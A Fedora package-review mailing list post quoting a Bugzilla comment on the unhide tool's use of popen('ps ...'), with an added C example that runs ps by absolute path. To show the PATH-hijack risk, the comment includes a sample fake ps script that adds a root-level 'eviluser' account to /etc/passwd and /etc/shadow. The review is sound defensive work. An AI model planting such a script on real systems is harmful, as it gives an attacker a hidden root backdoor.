https://bugzilla.redhat.com/show_bug.cgi?id=469843

--- Comment #5 from manuel wolfshant <[EMAIL PROTECTED]>  2008-12-08 14:57:46 EDT ---
Looking at the code, I see that unhide.c does:
    #define COMMAND "ps -eLf | awk '{ print $2 }' | grep -v PID"
followed by  
    fich_tmp=popen (COMMAND, "r") ;


Now, my C is quite rusty, but 
- AFAIR, you must be root to see some of the info this program requires
- anything named "ps" and found in root's PATH will be launched by the above
code

To be honest, I would not run this "security application" on my system. I am
afraid of something along 
cat >> /usr/local/bin/ps << EOF
#! /bin/bash
echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >>
/etc/shadow
/bin/ps $*
EOF

_______________________________________________
Fedora-package-review mailing list
[email protected]
http://www.redhat.com/mailman/listinfo/fedora-package-review
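
The concern raised in comment #5 is that popen() hands COMMAND to a shell, which resolves the bare name "ps" through the caller's PATH. The following is an added example, not code from unhide or from the bug report: one way to avoid that lookup is to exec ps by absolute path under a fixed environment and parse the PID column in C. The names run_trusted, parse_pids and PS_PATH, and the environment values, are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
#define PS_PATH "/bin/ps" /* assumption: where the distribution installs ps */

/* Exec path directly (no shell, no PATH search); returns bytes read or -1. */
static ssize_t run_trusted(const char *path, char *const argv[],
                           char *out, size_t outlen)
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };
    int fds[2], status; size_t used = 0; ssize_t n;
    if (outlen == 0 || pipe(fds) == -1) return -1;
    pid_t pid = fork();
    if (pid == -1) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {                    /* child: stdout -> pipe, then exec */
        if (dup2(fds[1], STDOUT_FILENO) == -1) _exit(127);
        close(fds[0]); close(fds[1]);
        execve(path, argv, clean_env); /* the caller's environment is dropped */
        _exit(127);
    }
    close(fds[1]);
    while (used < outlen - 1 &&
           (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0'; close(fds[0]);   /* output past outlen - 1 is discarded */
    if (waitpid(pid, &status, 0) == -1) return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? (ssize_t)used : -1;
}

/* Field 2 of each row; the header fails %ld, replacing awk | grep -v PID. */
static size_t parse_pids(const char *text, long *pids, size_t max)
{
    size_t count = 0;
    for (const char *line = text; line && *line && count < max;
         line = strchr(line, '\n'), line = line ? line + 1 : NULL)
        if (sscanf(line, "%*s %ld", &pids[count]) == 1) count++;
    return count;
}

int main(void)
{
    static char buf[1 << 20]; static long pids[4096];
    char *const argv[] = { "ps", "-eLf", NULL };
    if (run_trusted(PS_PATH, argv, buf, sizeof buf) < 0) return 1;
    printf("%zu rows parsed\n", parse_pids(buf, pids, 4096));
    return 0;
}
```

This removes the PATH dependency only; whether the binary at the fixed path is itself trustworthy is a separate question.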
